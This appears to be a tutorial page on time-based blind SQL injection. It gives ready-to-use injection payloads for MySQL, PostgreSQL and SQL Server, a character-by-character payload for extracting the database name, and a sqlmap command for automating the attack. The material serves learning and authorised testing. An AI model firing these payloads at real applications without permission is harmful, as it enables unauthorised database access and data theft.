Skip to content

Time-Based Blind SQL Injection

Time-based blind SQLi is an inferential technique used when an application gives no difference in output whether a query is TRUE or FALSE. Instead, the attacker injects a command that forces the database to wait for a specified amount of time if a condition is true.

The attacker can then infer the answer to the question based on how long the server takes to respond.

Methodology

The core of this attack is using a conditional statement (IF or CASE) combined with a time-delay function.

1. Confirm the Vulnerability

Inject a payload that causes a noticeable delay.

Vulnerable URL: http://example.com/items.php?id=1

MySQL (SLEEP) Payload: 

-- If 1=1 (true), wait for 5 seconds.
' AND IF(1=1, SLEEP(5), 0)--
If the server takes approximately 5 seconds longer to respond, the vulnerability is confirmed.

PostgreSQL (pg_sleep) Payload: 

' AND (SELECT pg_sleep(5)) IS NOT NULL--

Microsoft SQL Server (WAITFOR DELAY) Payload: 

'; IF (1=1) WAITFOR DELAY '0:0:5'--

2. Enumerate Database Information

Similar to boolean-based techniques, you can now ask questions and infer the answer from the response time.

Extract Database Name (Character by Character): 

-- If the first character of the database name is 'a', sleep for 5 seconds.
' AND IF((SELECT SUBSTRING(database(), 1, 1)) = 'a', SLEEP(5), 0)--
If the server delays, the character is 'a'. If not, try 'b', 'c', and so on.

3. Automation with sqlmap

sqlmap is essential for time-based attacks, as manual exploitation is impractical. 

sqlmap -u "http://example.com/items.php?id=1" --dbs --technique=T